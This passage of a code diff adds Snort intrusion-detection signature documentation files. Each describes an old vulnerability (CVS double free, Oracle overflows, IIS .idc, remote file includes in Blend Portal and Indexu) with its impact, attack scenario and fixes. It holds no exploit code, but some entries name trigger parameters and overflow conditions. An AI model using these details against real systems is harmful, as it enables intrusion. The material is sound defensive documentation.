+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the web interface
+
+Enable NTLM authentication for the administrative interface
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3327
+
+--
--- /dev/null
+++ b/doc/signatures/2010.txt
@@ -0,0 +1,98 @@
+Rule:
+
+--
+Sid:
+2010
+
+--
+Summary:
+CVS is the Concurrent Versions System, commonly used to 
+help manage software development. It is possible for a remote
+attacker to exploit a bug in the cvs daemon that will allow the 
+perpetrator the ability to execute code, issue a denial of service, 
+compromise code being stored in CVS and read sensitive information. 
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources on the machine. Software development could 
+be halted, code could be lost or stolen and code auditing after the fact
+could affect delivery of software.
+
+--
+Detailed Information:
+Specially crafted directory requests can be used to exploit a double 
+free memory reference bug in the CVS software. It is possible to force 
+the CVS daemon to execute an error that returns a pointer to already 
+freed memory. This is a well known bug.
+
+Since cvsd may be run as root via inetd, the compromise will present the
+attacker with root privileges on the machine. Any code the attacker is 
+able to execute will have root privileges.
+
+It is also possible for the attacker to bypass all write checks and be 
+able to write to the repository using the "anonymous" or "anoncvs" 
+accounts commonly used for read only access. The source code may then be
+compromised by the attacker who could choose to insert malicious code of
+his own making.
+
+If the CVS password database is writable by the CVS user the result is a
+remote root compromise.
+
+For CVS daemons running under changed root conditions (chroot), the rest
+of the operating system files may be protected but the entire CVS 
+directory structure is vulnerable.
+
+--
+Affected Systems:
+	CVS versions 1.11.4 and earlier
+	
+--
+Attack Scenarios:
+The attacker could pass a specially crafted directory request to trigger
+an error condition. The attacker may then be presented with the 
+opportunity to execute code or issue shell commands on some systems.
+
+--
+Ease of Attack:
+Simple, an exploit is available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+Connections to the server using zlib compression will not generate this
+event.
+
+--
+Corrective Action:
+Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon 
+as a user other than root that does not have a valid login to the 
+machine.
+
+Disable anonymous access to the cvs server.
+
+Update the CVS software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+www.cert.org/advisories/CA-2003-02.html
+www.kb.cert.org/vuls/id/650937
+
+CVE Entry:
+CAN-2003-0015
+
+CVS:
+http://ccvs.cvshome.org/servlets/NewsItemView?newsID=51
+
+--
--- /dev/null
+++ b/doc/signatures/2164.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2164
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/951.txt
@@ -0,0 +1,83 @@
+Rule:
+
+--
+Sid:
+951
+
+--
+
+Summary:
+This event is generated when an attempt is made to access a file with 
+Microsoft Personal Web Server login information.
+
+--
+
+Impact:
+If successful, the attacker can log into the system and modify web 
+content.
+
+--
+
+Detailed Information:
+On systems running Microsoft Personal Web Server the file authors.pwd 
+contains usernames and encrypted passwords for users who can author the 
+contents on this server. The attacker can guess the exact URL of this 
+file and request it, hence gaining insecure information.
+
+--
+
+Affected Systems:
+Certain versions of Microsoft Windows 95 or Windows 98 running Personal 
+Web Server 4.0. Windows NT installations are not affected.
+
+--
+
+Attack Scenarios:
+An attacker can request the file from its standard location, entering 
+the exact URL, and gain access to the system after cracking the 
+passwords found in the file.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Apply the appropriate vendor supplied patch.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+Official fix:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS99-010.asp
+
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10078
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0386
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2452.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2452
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running attempts to maintain contact with a Yahoo IM server.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+Hosts running Yahoo IM periodically communicate with a Yahoo IM server to maintain their connection.  This is a keep-alive message that simply indicates the presences of a host running Yahoo IM.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+This particular type of Yahoo IM exchange has no known attacks, however it may represent a policy violation because the host is running Yahoo IM.
+
+--
+Ease of Attack:
+A host running Yahoo IM will automatically ping a Yahoo IM server.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2982.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2982
+
+--
+Summary:
+This event is generated when an attempt is made to access the ADMIN$
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/560.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+560
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+application or service that may violate a corporate security policy.
+
+--
+Impact:
+This may be a violation of corporate policy since some applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation. In
+some instances this event may indicate behavior contrary to best
+security practices.
+
+In this case the event is generated when a VNC server response is
+detected. This traffic indicates that a VNC client has made an attempt
+to connect to a VNC server.
+
+Virtual Network Computing (VNC) allows users to connect machines across
+a network. It allows full control of the connected machine to take
+place, the user can access all resources on the machine and any other
+resources that machine is connected to.
+
+--
+Detailed Information:
+This event may indicate a violation of corporate policy. It may also
+indicate the use of services or applications that may be the antithesis
+of best security practices.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+Violation of corporate security policy can manifest serious risk to
+company assets.
+
+--
+Ease of Attack:
+Not applicable
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure adherence to best security practices and strict adherence to
+corporate policy
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000122.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+100000122
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a buffer overflow in 
+the Macromedia mod_jrun module.
+
+-- 
+
+Impact: 
+The affected server will be crashed, and remote code execution with the 
+privileges of the server is possible.
+
+--
+Detailed Information:
+Specially crafted data which is sent to the vulnerable server that contains a 
+colon followed by 1,000 or more bytes will trigger this buffer overflow. The 
+affected server will crash, and remote code execution with the privileges of 
+the affected server is possible.
+NOTE: This rule may severely impact performance. It is recommended that you 
+disable this rule if you are not running vulnerable software.
+
+--
+Affected Systems:
+Macromedia ColdFusion MX 6.0
+Macromedia ColdFusion MX 6.1
+Macromedia ColdFusion MX J2EE 6.1
+Macromedia JRun 3.0
+Macromedia JRun 3.1
+Macromedia JRun 4.0
+Hitachi Cosminexus Enterprise Enterprise Edition 01-02
+Hitachi Cosminexus Enterprise Enterprise Edition 01-01
+Hitachi Cosminexus Enterprise Standard Edition 01-02
+Hitachi Cosminexus Enterprise Standard Edition 01-01
+Hitachi Cosminexus Server Web Edition 01-02
+Hitachi Cosminexus Server Web Edition 01-01
+
+--
+
+Attack Scenarios: 
+A script must be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as an attack is included as part of the Metasploit vulnerability 
+testing framework.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Patches are available from Macromedia. As a workaround, the vendor suggests 
+disabling the "verbose" debug mode on web server connectors, as it will stop 
+attackers from exploiting this vulnerability.
+
+--
+Contributors: 
+Judy Novak <judy.novak@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/801.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+801
+
+--
+Summary:
+This rule has been placed in deleted.rules. It has been superceded by
+sid 721.
+
+--
+Impact:
+Mail worms may spread rapidly because users execute them.
+
+--
+Detailed Information:
+Windows systems are often configured not to display file extensions.
+By adding a second extension, users get confused and think that an
+executable is a WORD document - e.g. resume.doc.vbs gets displayed as
+resume.doc but is a visual basic script and not a WORD document.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Famous worms (ILOVEYOU, KOURNIKOVA) are based on this method. Warning:
+A WORD document is in now way more secure than a visual basic script.
+Wrongly configured antivirus software my ignore this files and
+let a macro virus pass.
+
+--
+Ease of Attack:
+Very easy. One needs to attach a file and hope that it gets executed.
+
+--
+False Positives:
+Could be an error on sender's side.
+
+--
+False Negatives:
+None Known
+-
+
+--
+Corrective Action:
+Use antivirus software. Configure mail clients securely, especially when
+using windows desktops. Educate your mail users. Deny all attachments at
+the gateway if you can.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by tobias.haecker@to.com
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/673.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+NGSSoftware Advisory:
+http://www.nextgenss.com/advisories/mssql-jobs2.txt
+
+--
--- /dev/null
+++ b/doc/signatures/510.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+510
+
+--
+Summary:
+This event is generated when an attempt is made to change the message on
+the LCD display on a JetDirect enabled HP printer.
+
+--
+Impact:
+User confusion and comedy, mostly.
+
+--
+Detailed Information:
+HP JetDirect printers allow remote machines to change the message that
+is displayed on the LCD panel via the PJL command. This event indicates
+that this command has been used in network traffic.
+
+--
+Affected Systems:
+	HP JetDirect enabled printers
+ 
+--
+Attack Scenarios:
+As part of an attempt to confuse and annoy users, an attacker may
+attempt to change the message displayed on the printers LCD screen.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Update to the latest JetDirect, and investigate the possibility of
+restricting access to a central print-server using the "allow: <ip>
+<netmask>" directive in a printer config file. 
+
+Disallow printer use from hosts outside the protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000352.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000352
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Blend Portal" application running on a webserver. Access to the file "blend_common.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "blend_common.php" script used by the "Blend Portal" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blend Portal
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2650.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2650
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+
+An attacker can attempt to connect to a database using an overly
+long user name value. This can cause a buffer overflow, allowing
+an attacker to execute arbitrary code.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+       Oracle8, Oracle8i, and Oracle9i
+
+--
+Attack Scenarios:
+An attacker can attempt to connect to a database supplying the
+user an overly long value.  The result could permit the
+attacker to gain escalated privileges and run code of their
+choosing.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck62.html
+
+--
--- /dev/null
+++ b/doc/signatures/1660.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Don't have affected systems
+Sid:
+1660
+ 
+--
+Summary:
+This event is generated when an attempt is made to trace previous web requests on the vulnerable server.
+
+--
+Impact:
+Information gathering.  This attack may permit viewing sensitive information such as Session ID values and the paths associated with the web requests.
+
+--
+Detailed Information:
+Microsoft ASP.NET is software used for developing web applications.  It may have tracing enabled to view the previous 50 web requests to the server. At attacker may view sensitive information such as Session ID values and the paths associated withe previous web requests.
+
+--
+Affected Systems:
+
+
+Attack Scenarios:
+An attacker can attempt to access the traced requests to gather information.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Set <trace enabled=false> in web.config
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10993
+
+--
--- /dev/null
+++ b/doc/signatures/327.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 327
+
+-- 
+
+Summary: 
+This event is generated when a remote command execution exploit against a finger daemon is attempted.
+
+-- 
+
+Impact: 
+Serious. The attacker may be presented with the opportunity to run a command of his choice on the target UNIX system
+
+--
+Detailed Information:
+This event is generated when a specific attack against a vulnerable version of the finger daemon is detected. 
+
+The Finger daemon is used to provide information about users on a UNIX system. It used to be installed and enabled by default on most UNIX/Linux systems. The attack may allow an attacker to execute a command remotely on a target system with the privileges of the user running the "finger" daemon. The user is usually defined in the /etc/inetd.conf file and is commonly designated as "nobody".
+
+--
+Attack Scenarios: 
+An attacker may try the attack and then executes a command to download a backdoor to the target system. He then connects to the system and may attempt to escalate his privileges by exploiting a local SUID application to gain "root" privileges.
+
+-- 
+
+Ease of Attack: 
+Simple, no exploit software is required, just a specially formatted finger query
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the service via firewall or TCP wrappers.
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0152
+
+Arachnids:
+http://www.whitehats.com/info/IDS380
+
+Bugtraq:
+http://online.securityfocus.com/bid/2220
+
+--
--- /dev/null
+++ b/doc/signatures/433.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+433
+
+--
+
+Summary:
+This event is generated when a host generates and ICMP Type 40 datagram with an undefined ICMP Code.
+
+--
+
+Impact:
+ICMP Type 40 datagrams are an indication that a received datagram failed a integrity check for a given SPI.  Normally this is an indication that hosts using IP Security Protocols such as AH or ESP have been configured incorrectly or are failing to establish a session with another host.
+
+--
+
+Detailed Information:
+Hosts using IP Security Protocols such as AH or ESP generate ICMP Type 40 datagrams when a failure condition occurs.  ICMP Type 40 datagrams are generated when a received datagram fails an integrity check for a given SPI (Security Parameters Index).  ICMP Type 40 datagrams should never be generated with an undefined ICMP Code, this could be an indication of nefarious network activity. 
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 40 datagrams not normally seen on the network.  Currently Sourcefire is unaware of any hardware that has implemented these types of ICMP datagrams.  Hosts generating these types of ICMP datagrams should be investigated for nefarious activity or configuration errors. 
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC2521
+
+
+--
--- /dev/null
+++ b/doc/signatures/894.txt
@@ -0,0 +1,52 @@
+Rule:
+--
+Sid:
+894
+
+--
+Summary:
+This event is generated when an attempt is made to display historical 
+information from a Big Brother system monitor host.
+
+--
+Impact:
+Information Disclosure.
+
+--
+Detailed Information:
+Big Brother is a monitoring system used by many organisations.  It records both current and historical information about monitored hosts on a network.  Access to the system status is via a series of web pages and CGI scripts.  Version 1.09b & 1.09c contained a bug in bb-hist.sh that could be made to display files accessible by the user under which the CGI script is run.
+
+--
+Attack Scenarios:
+A malicious user could use this vulnerability to gain more information about the Big Brother host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives: 
+None known
+
+--
+Corrective Action:
+Upgrade to a later version of Big Brother at least 1.09d
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References: 
+url,http://bb4.com/
+cve,CAN-1999-1462
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000620.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000620
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_view.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "link_view.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2833.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2833
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_master_repgroup
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3200.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3200
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft WINS.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft WINS such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker would need to send multiple malformed request to the WINS
+service running on a host.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Uninstall the WINS service.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2655.txt
@@ -0,0 +1,70 @@
+Rule:
+
+-- 
+Sid:
+2655
+
+-- 
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with an HP WebJetAdmin web server.
+
+-- 
+Impact:
+A successful attack may allow the execution of arbitrary code as root on UNIX
+and SYSTEM on Windows on a vulnerable server.
+
+-- 
+Detailed Information:
+The HP Web JetAdmin application allows users to manage HP JetDirect-connected
+printers within their intranet using a browser. The httpd core supports an
+exported function called ExecuteFile. A vulnerability exists that allows the
+uploading and execution of unauthorized files by posting a malicious http
+request with the script /plugins/framework/script/content.hts in conjunction
+with ExecuteFile function to the web server. Discovery of the vulnerability is
+credited to FX of Phenoelit.
+
+-- 
+Affected Systems:
+	HP Web JetAdmin 6.5.
+
+-- 
+Attack Scenarios:
+An attacker can create upload and execute a malicious file on a vulnerable server.
+
+-- 
+Ease of Attack:
+Simple.
+
+-- 
+False Positives:
+None known.
+
+-- 
+False Negatives:
+The default HP Web JetAdmin port is 8000. If an administrator selects a
+different port on which to run the web server, no event will be
+generated. In that case, the rule should be altered to reflect the 
+port on which the web server runs. 
+
+-- 
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+-- 
+Contributors:
+Thomas Alex <talex@edhacker.com>
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Phenoelit:
+http://www.phenoelit.de/stuff/HP_Web_Jetadmin_advisory.txt>
+
+Hewlett-Packard:
+http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=PSD_HPSBPI01026
+
+--
--- /dev/null
+++ b/doc/signatures/1017.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1017
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with a file with an extension of .idc.
+
+--
+Impact:
+Remote access.  This attack may permit the execution of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) supports file extensions including .idc that call the ISM.DLL.  A buffer overflow vulnerability exists in ISM.DLL code when it receives a malformed request, permitting the execution of arbitrary code.  
+
+--
+Affected Systems:
+IIS 4.0 hosts
+
+--
+Attack Scenarios:
+An attacker can send a malformed request of file with a .idc extension that causes a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0874
+
+
+--
--- /dev/null
+++ b/doc/signatures/3292.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3292
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
